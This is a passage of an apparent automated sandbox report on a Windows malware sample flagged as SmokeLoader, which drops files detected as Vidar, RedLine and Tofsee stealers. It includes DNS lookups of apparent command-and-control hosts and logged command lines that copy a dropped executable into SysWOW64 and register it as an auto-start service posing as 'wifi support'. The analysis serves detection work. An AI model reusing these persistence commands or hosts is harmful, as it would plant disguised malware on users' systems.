Jan 14, 2022 21:05:59.990679026 CET | 8.8.8.8 | 192.168.2.5 | 0x109b | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:00.174967051 CET | 8.8.8.8 | 192.168.2.5 | 0xa8a6 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:00.559953928 CET | 8.8.8.8 | 192.168.2.5 | 0xa441 | No error (0) | data-host-coin-8.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:03.830070972 CET | 8.8.8.8 | 192.168.2.5 | 0x1cf8 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:04.031857014 CET | 8.8.8.8 | 192.168.2.5 | 0xab6b | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:04.479187965 CET | 8.8.8.8 | 192.168.2.5 | 0xc3c1 | No error (0) | data-host-coin-8.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:05.771756887 CET | 8.8.8.8 | 192.168.2.5 | 0xcdcd | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:06.013828039 CET | 8.8.8.8 | 192.168.2.5 | 0x1c4 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:11.572953939 CET | 8.8.8.8 | 192.168.2.5 | 0x40ed | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:11.819535017 CET | 8.8.8.8 | 192.168.2.5 | 0x1d4c | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:12.016437054 CET | 8.8.8.8 | 192.168.2.5 | 0xbaf8 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:12.193625927 CET | 8.8.8.8 | 192.168.2.5 | 0xa8a5 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:12.238771915 CET | 8.8.8.8 | 192.168.2.5 | 0x3b8e | No error (0) | patmushta.info | | 94.142.143.116 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:12.452526093 CET | 8.8.8.8 | 192.168.2.5 | 0xe862 | No error (0) | transfer.sh | | 144.76.136.153 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:14.980345964 CET | 8.8.8.8 | 192.168.2.5 | 0xc20d | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:15.163513899 CET | 8.8.8.8 | 192.168.2.5 | 0x2ad7 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:15.351063967 CET | 8.8.8.8 | 192.168.2.5 | 0x31ff | No error (0) | transfer.sh | | 144.76.136.153 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:16.761666059 CET | 8.8.8.8 | 192.168.2.5 | 0x3ccd | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:16.924042940 CET | 8.8.8.8 | 192.168.2.5 | 0x497c | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:17.104187012 CET | 8.8.8.8 | 192.168.2.5 | 0xc79c | No error (0) | transfer.sh | | 144.76.136.153 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:18.450618029 CET | 8.8.8.8 | 192.168.2.5 | 0x98a1 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:18.614340067 CET | 8.8.8.8 | 192.168.2.5 | 0xa8de | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:18.853131056 CET | 8.8.8.8 | 192.168.2.5 | 0x4b70 | No error (0) | transfer.sh | | 144.76.136.153 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:22.483175039 CET | 8.8.8.8 | 192.168.2.5 | 0x471d | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:25.090707064 CET | 8.8.8.8 | 192.168.2.5 | 0x577d | No error (0) | cdn.discordapp.com | | 162.159.135.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:25.090707064 CET | 8.8.8.8 | 192.168.2.5 | 0x577d | No error (0) | cdn.discordapp.com | | 162.159.129.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:25.090707064 CET | 8.8.8.8 | 192.168.2.5 | 0x577d | No error (0) | cdn.discordapp.com | | 162.159.133.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:25.090707064 CET | 8.8.8.8 | 192.168.2.5 | 0x577d | No error (0) | cdn.discordapp.com | | 162.159.130.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:25.090707064 CET | 8.8.8.8 | 192.168.2.5 | 0x577d | No error (0) | cdn.discordapp.com | | 162.159.134.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:29.273663998 CET | 8.8.8.8 | 192.168.2.5 | 0x710e | No error (0) | api.ip.sb | api.ip.sb.cdn.cloudflare.net | | CNAME (Canonical name) | IN (0x0001)
Jan 14, 2022 21:06:29.303054094 CET | 8.8.8.8 | 192.168.2.5 | 0x8279 | No error (0) | api.ip.sb | api.ip.sb.cdn.cloudflare.net | | CNAME (Canonical name) | IN (0x0001)
Jan 14, 2022 21:06:29.475207090 CET | 8.8.8.8 | 192.168.2.5 | 0x7bba | No error (0) | ipwhois.app | | 136.243.172.101 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:29.765475035 CET | 8.8.8.8 | 192.168.2.5 | 0xcbd5 | No error (0) | microsoft-com.mail.protection.outlook.com | | 40.93.212.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:29.765475035 CET | 8.8.8.8 | 192.168.2.5 | 0xcbd5 | No error (0) | microsoft-com.mail.protection.outlook.com | | 40.93.207.1 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:29.765475035 CET | 8.8.8.8 | 192.168.2.5 | 0xcbd5 | No error (0) | microsoft-com.mail.protection.outlook.com | | 104.47.53.36 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:29.765475035 CET | 8.8.8.8 | 192.168.2.5 | 0xcbd5 | No error (0) | microsoft-com.mail.protection.outlook.com | | 104.47.54.36 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:29.765475035 CET | 8.8.8.8 | 192.168.2.5 | 0xcbd5 | No error (0) | microsoft-com.mail.protection.outlook.com | | 52.101.24.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:29.765475035 CET | 8.8.8.8 | 192.168.2.5 | 0xcbd5 | No error (0) | microsoft-com.mail.protection.outlook.com | | 40.93.207.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:30.046150923 CET | 8.8.8.8 | 192.168.2.5 | 0xa536 | No error (0) | c9d0e790b353537889bd47a364f5acff43c11f248.xyz | | 185.112.83.97 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:30.232129097 CET | 8.8.8.8 | 192.168.2.5 | 0xd2fb | No error (0) | cdn.discordapp.com | | 162.159.133.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:30.232129097 CET | 8.8.8.8 | 192.168.2.5 | 0xd2fb | No error (0) | cdn.discordapp.com | | 162.159.135.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:30.232129097 CET | 8.8.8.8 | 192.168.2.5 | 0xd2fb | No error (0) | cdn.discordapp.com | | 162.159.134.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:30.232129097 CET | 8.8.8.8 | 192.168.2.5 | 0xd2fb | No error (0) | cdn.discordapp.com | | 162.159.129.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:30.232129097 CET | 8.8.8.8 | 192.168.2.5 | 0xd2fb | No error (0) | cdn.discordapp.com | | 162.159.130.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:30.473182917 CET | 8.8.8.8 | 192.168.2.5 | 0x9061 | No error (0) | transfer.sh | | 144.76.136.153 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:32.947655916 CET | 8.8.8.8 | 192.168.2.5 | 0xd453 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:34.743685961 CET | 8.8.8.8 | 192.168.2.5 | 0xa787 | No error (0) | github.com | | 140.82.121.4 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:34.869694948 CET | 8.8.8.8 | 192.168.2.5 | 0x332d | No error (0) | raw.githubusercontent.com | | 185.199.108.133 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:34.869694948 CET | 8.8.8.8 | 192.168.2.5 | 0x332d | No error (0) | raw.githubusercontent.com | | 185.199.109.133 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:34.869694948 CET | 8.8.8.8 | 192.168.2.5 | 0x332d | No error (0) | raw.githubusercontent.com | | 185.199.110.133 | A (IP address) | IN (0x0001)
Jan 14, 2022 21:06:34.869694948 CET | 8.8.8.8 | 192.168.2.5 | 0x332d | No error (0) | raw.githubusercontent.com | | 185.199.111.133 | A (IP address) | IN (0x0001)

                                                                                                                      HTTP Request Dependency Graph

                                                                                                                      • xmmufccsxa.net

                                                                                                                      Code Manipulations

                                                                                                                      Statistics

                                                                                                                      Behavior

                                                                                                                      System Behavior

                                                                                                                      General

                                                                                                                      Start time:21:04:12
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Users\user\Desktop\OG9rNsihJ7.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\OG9rNsihJ7.exe"
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:321024 bytes
                                                                                                                      MD5 hash:5C7B46771055043F59E0451A342B7ED1
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:low

                                                                                                                      General

                                                                                                                      Start time:21:04:14
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Users\user\Desktop\OG9rNsihJ7.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\OG9rNsihJ7.exe"
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:321024 bytes
                                                                                                                      MD5 hash:5C7B46771055043F59E0451A342B7ED1
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.298084613.0000000000680000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.298215878.0000000001FA1000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                      Reputation:low

                                                                                                                      General

                                                                                                                      Start time:21:04:21
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\Explorer.EXE
                                                                                                                      Imagebase:0x7ff693d90000
                                                                                                                      File size:3933184 bytes
                                                                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000000.279897390.0000000003031000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                      Reputation:high

                                                                                                                      General

                                                                                                                      Start time:21:04:24
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                      Imagebase:0x7ff797770000
                                                                                                                      File size:51288 bytes
                                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high

                                                                                                                      General

                                                                                                                      Start time:21:04:25
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                      Imagebase:0x7ff797770000
                                                                                                                      File size:51288 bytes
                                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high

                                                                                                                      General

                                                                                                                      Start time:21:04:35
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                                      Imagebase:0x7ff797770000
                                                                                                                      File size:51288 bytes
                                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high

                                                                                                                      General

                                                                                                                      Start time:21:04:36
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                      Imagebase:0x7ff797770000
                                                                                                                      File size:51288 bytes
                                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high

                                                                                                                      General

                                                                                                                      Start time:21:04:36
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                      Imagebase:0x7ff797770000
                                                                                                                      File size:51288 bytes
                                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high

                                                                                                                      General

                                                                                                                      Start time:21:04:37
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                      Imagebase:0x7ff6999d0000
                                                                                                                      File size:163336 bytes
                                                                                                                      MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high

                                                                                                                      General

                                                                                                                      Start time:21:04:37
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                                      Imagebase:0x7ff797770000
                                                                                                                      File size:51288 bytes
                                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high

                                                                                                                      General

                                                                                                                      Start time:21:04:42
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                      Imagebase:0x7ff797770000
                                                                                                                      File size:51288 bytes
                                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high

                                                                                                                      General

                                                                                                                      Start time:21:04:56
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Users\user\AppData\Roaming\vfgiwcs
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\vfgiwcs
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:321024 bytes
                                                                                                                      MD5 hash:5C7B46771055043F59E0451A342B7ED1
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                      Reputation:low

                                                                                                                      General

                                                                                                                      Start time:21:04:58
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Users\user\AppData\Roaming\vfgiwcs
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\vfgiwcs
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:321024 bytes
                                                                                                                      MD5 hash:5C7B46771055043F59E0451A342B7ED1
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000013.00000002.349879535.00000000004A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000013.00000002.349992094.0000000001F51000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                      Reputation:low

                                                                                                                      General

                                                                                                                      Start time:21:05:00
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\B1B2.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\B1B2.exe
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:301056 bytes
                                                                                                                      MD5 hash:277680BD3182EB0940BC356FF4712BEF
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                      Reputation:moderate

                                                                                                                      General

                                                                                                                      Start time:21:05:03
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                      Imagebase:0x7ff797770000
                                                                                                                      File size:51288 bytes
                                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                      General

                                                                                                                      Start time:21:05:04
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\BFBD.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\BFBD.exe
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:321024 bytes
                                                                                                                      MD5 hash:5C7B46771055043F59E0451A342B7ED1
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 100%, Joe Sandbox ML

                                                                                                                      General

                                                                                                                      Start time:21:05:04
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6924 -ip 6924
                                                                                                                      Imagebase:0xe40000
                                                                                                                      File size:434592 bytes
                                                                                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                      General

                                                                                                                      Start time:21:05:08
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\BFBD.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\BFBD.exe
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:321024 bytes
                                                                                                                      MD5 hash:5C7B46771055043F59E0451A342B7ED1
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000018.00000002.366966979.00000000004B0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000018.00000002.366989519.00000000004D1000.00000004.00020000.sdmp, Author: Joe Security

                                                                                                                      General

                                                                                                                      Start time:21:05:08
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                      Imagebase:0x7ff797770000
                                                                                                                      File size:51288 bytes
                                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                      General

                                                                                                                      Start time:21:05:08
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6924 -s 520
                                                                                                                      Imagebase:0xe40000
                                                                                                                      File size:434592 bytes
                                                                                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                      General

                                                                                                                      Start time:21:05:08
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\254E.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\254E.exe
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:324096 bytes
                                                                                                                      MD5 hash:41AB3EFA04441E560A279BD0F7C0503D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001C.00000002.357825450.000000000083A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000001C.00000002.357825450.000000000083A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000001C.00000002.357794608.000000000081A000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 100%, Joe Sandbox ML

                                                                                                                      General

                                                                                                                      Start time:21:05:12
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\3136.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\3136.exe
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:321536 bytes
                                                                                                                      MD5 hash:023802260A0216012A5F00079406D967
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000001D.00000002.380383276.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000001D.00000003.362218485.00000000007F0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000001D.00000002.380671348.00000000006C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 100%, Joe Sandbox ML

                                                                                                                      General

                                                                                                                      Start time:21:05:15
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\3BC6.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\3BC6.exe
                                                                                                                      Imagebase:0x650000
                                                                                                                      File size:537088 bytes
                                                                                                                      MD5 hash:D7DF01D8158BFADDC8BA48390E52F355
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001E.00000002.412827478.0000000003991000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 100%, Avira
                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                      • Detection: 46%, Metadefender
                                                                                                                      • Detection: 89%, ReversingLabs

                                                                                                                      General

                                                                                                                      Start time:21:05:16
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ffiawxs\
                                                                                                                      Imagebase:0x150000
                                                                                                                      File size:232960 bytes
                                                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                      General

                                                                                                                      Start time:21:05:17
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7ecfc0000
                                                                                                                      File size:625664 bytes
                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:21:05:17
Start date:14/01/2022
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\xqfkdfcl.exe" C:\Windows\SysWOW64\ffiawxs\
Imagebase:0x150000
File size:232960 bytes
MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:21:05:18
Start date:14/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7ecfc0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:21:05:18
Start date:14/01/2022
Path:C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):true
Commandline:C:\Windows\System32\sc.exe" create ffiawxs binPath= "C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe /d\"C:\Users\user\AppData\Local\Temp\3136.exe\"" type= own start= auto DisplayName= "wifi support
Imagebase:0xa0000
File size:60928 bytes
MD5 hash:24A3E2603E63BCB9695A2935D3B24695
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:21:05:19
Start date:14/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7ecfc0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:21:05:19
Start date:14/01/2022
Path:C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):true
Commandline:C:\Windows\System32\sc.exe" description ffiawxs "wifi internet conection
Imagebase:0xa0000
File size:60928 bytes
MD5 hash:24A3E2603E63BCB9695A2935D3B24695
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:21:05:20
Start date:14/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
